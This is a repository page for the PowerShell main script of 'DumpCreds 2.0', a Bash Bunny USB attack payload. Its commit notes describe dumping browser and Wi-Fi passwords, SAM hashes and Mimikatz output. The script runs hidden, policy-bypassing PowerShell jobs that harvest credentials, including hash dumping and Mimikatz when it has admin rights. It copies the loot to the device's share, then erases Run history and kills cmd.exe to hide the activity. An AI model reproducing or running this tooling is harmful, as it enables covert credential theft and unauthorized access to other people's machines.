weyne/bashbunny-payloads
1
0
Fork 0
mirror of https://github.com/hak5darren/bashbunny-payloads.git synced 2025-10-29 16:58:12 +00:00
Code Issues Packages Projects Releases Wiki Activity
Files
217dee52498b37d2c0f7a28a3e8d2bfd812dd6d7
bashbunny-payloads/payloads/library/DumpCreds_2.0/main.ps1
Baur 18e71d2882 Added DumpCreds 2.0 payload (#138) 
* Add files via upload

Init of DumpCreds 2.0

Dumps the usernames & plaintext passwords from 
 - Browsers (Crome, IE, FireFox)
 - Wifi 
 - SAM Hashes
 - Mimimk@tz Dump
 - Computerinformation (Hardware Info, Windows ProductKey, Hotfixes, Software, Local, AD Userlist)
 
 without 
 - Use of USB Storage (Because USB Storage ist mostly blocked by USBGuard or DriveLock)
 - Internet connection (becaus Firewall ContentFilter Blocks the download sites)

* Minor Fix

* Somf file to much

* Changes in main.ps1 - paralellize the Powershell scripts

Changes in payload.txt - Universal payload no matter if admin rights or not

Some minor changes in all PS\*.ps1 files

Signed-off-by: qdba <dieter@baur.nu>

* Forget a File

* WifiCreds changed

* Changes in README.md

* Changed Get Chrome-Cred.ps1 from https://github.com/EmpireProject/Empire/tree/master/data/module_source/collection

Changed BUILD in main.ps1
Changed Build and Credits in README.md
2017-04-07 15:13:12 +10:00

106 lines
3.8 KiB
PowerShell
Raw Blame History

<#
.SYNOPSIS
DumpCred 2.0
.DESCRIPTION
Dumps all Creds from a PC
.PARAMETER <paramName>
none
.EXAMPLE
DumpCred
#>
$_Version = "2.0.2"
$_BUILD = "1003"
# Share on bashbunny
$SHARE="\\172.16.64.1\e"
$LOOT="$SHARE\loot"
$FILE="$LOOT\$env:COMPUTERNAME.txt"
$TMPFILE=[System.IO.Path]::GetTempFileName()
$isAdmin = ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")
$LINE3="`n`n`n"
# Wait for Share
do {
Start-Sleep -s 1
Write-Host -NoNewline "-"
} until (test-path \\172.16.64.1\e)
# Ok we got the connection.... Wait and Initiate the Handshake
# Handshake - create CON_REQ on Share. Bunny creates CON_OK if all is OK --- Check Share is writable
while ( -Not (Test-Path "$SHARE\CON_OK")) {
Start-Sleep -s 1
Write-Host -NoNewline "."
if ( -Not (( Test-Path "$SHARE\CON_REQ") -or (Test-Path "$SHARE\CON_OK"))) {
Write-output " " | out-file "$SHARE\CON_REQ"
Write-Host -NoNewline "+"
}
}
Write-Host "!"
# Go on......
# For Outpu we are useing a local TMP File because OUT-File -append to a Fil on Share does not work :-(
# Remove TMP File
Remove-Item $TMPFILE -ErrorAction SilentlyContinue
# Set Output buffer width to 500
# Update output buffer size to prevent clipping in Visual Studio output window.
if( $Host -and $Host.UI -and $Host.UI.RawUI ) {
$rawUI = $Host.UI.RawUI
$oldSize = $rawUI.BufferSize
$typeName = $oldSize.GetType( ).FullName
$newSize = New-Object $typeName (500, $oldSize.Height)
$rawUI.BufferSize = $newSize
}
"###DumpCreds " + $_VERSION + " Build " + $_BUILD + " Admin Mode: " + $isAdmin| OUT-File $TMPFILE
"=======================================================" | OUT-File -append $TMPFILE
$LINE3 | Add-Content $TMPFILE
# Start all Scripts in $SHARE\PS as job
# First remove all jobs I'm so bad....., don't care about running jobs
Stop-Job *
Remove-Job *
# Start all Jobs as background jobs
Write-Host "Wifi-Cred" ; start-job -ArgumentList $SHARE {Param($SHARE); powershell -WindowStyle Hidden -Exec Bypass $SHARE\PS\Get-WiFiCreds.ps1} | Out-Null
Write-Host "ChromeCred" ; start-job -ArgumentList $SHARE {Param($SHARE); powershell -WindowStyle Hidden -Exec Bypass $SHARE\PS\Get-ChromeCreds.ps1} | Out-Null
Write-Host "IECred" ; start-job -ArgumentList $SHARE {Param($SHARE); powershell -WindowStyle Hidden -Exec Bypass $SHARE\PS\Get-IECreds.ps1} | Out-Null
Write-Host "FireFoxCred" ; start-job -RunAs32 -ArgumentList $SHARE {param($SHARE); powershell -WindowStyle Hidden -Exec Bypass $SHARE\PS\Get-FoxDump.ps1} | Out-Null
Write-Host "Inventory" ; start-job -ArgumentList $SHARE {Param($SHARE); powershell -WindowStyle Hidden -Exec Bypass $SHARE\PS\Get-Inventory.ps1} | Out-Null
if ($isAdmin) {
Write-Host "Hashes" ; start-job -ArgumentList $SHARE {Param($SHARE); powershell -WindowStyle Hidden -Exec Bypass $SHARE\PS\Invoke-PowerDump.ps1} | Out-Null
Write-Host "M1m1k@tz" ; start-job -ArgumentList $SHARE {Param($SHARE); powershell -WindowStyle Hidden -Exec Bypass $SHARE\PS\Invoke-M1m1k@tz.ps1} | Out-Null
}
# Wait for all jobs
Get-Job | Wait-Job | Out-Null
# Receive all results
Get-Job | Receive-Job | Out-File -Append $TMPFILE
#Move TMP File to Bunny
move-item $TMPFILE -Destination $FILE -Force -ErrorAction SilentlyContinue
# Cleanup
# Remove Run History
Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue
# Rename CON_OK to CON_EOF so bunny knows that all the stuff has finished
Rename-Item -Path "$SHARE\CON_OK" -NewName "$SHARE\CON_EOF"
# Kill cmd.exe
Stop-Process -name cmd -ErrorAction SilentlyContinue
# Remove all Jobs from Joblist
Remove-Job *
Reference in New Issue View Git Blame Copy Permalink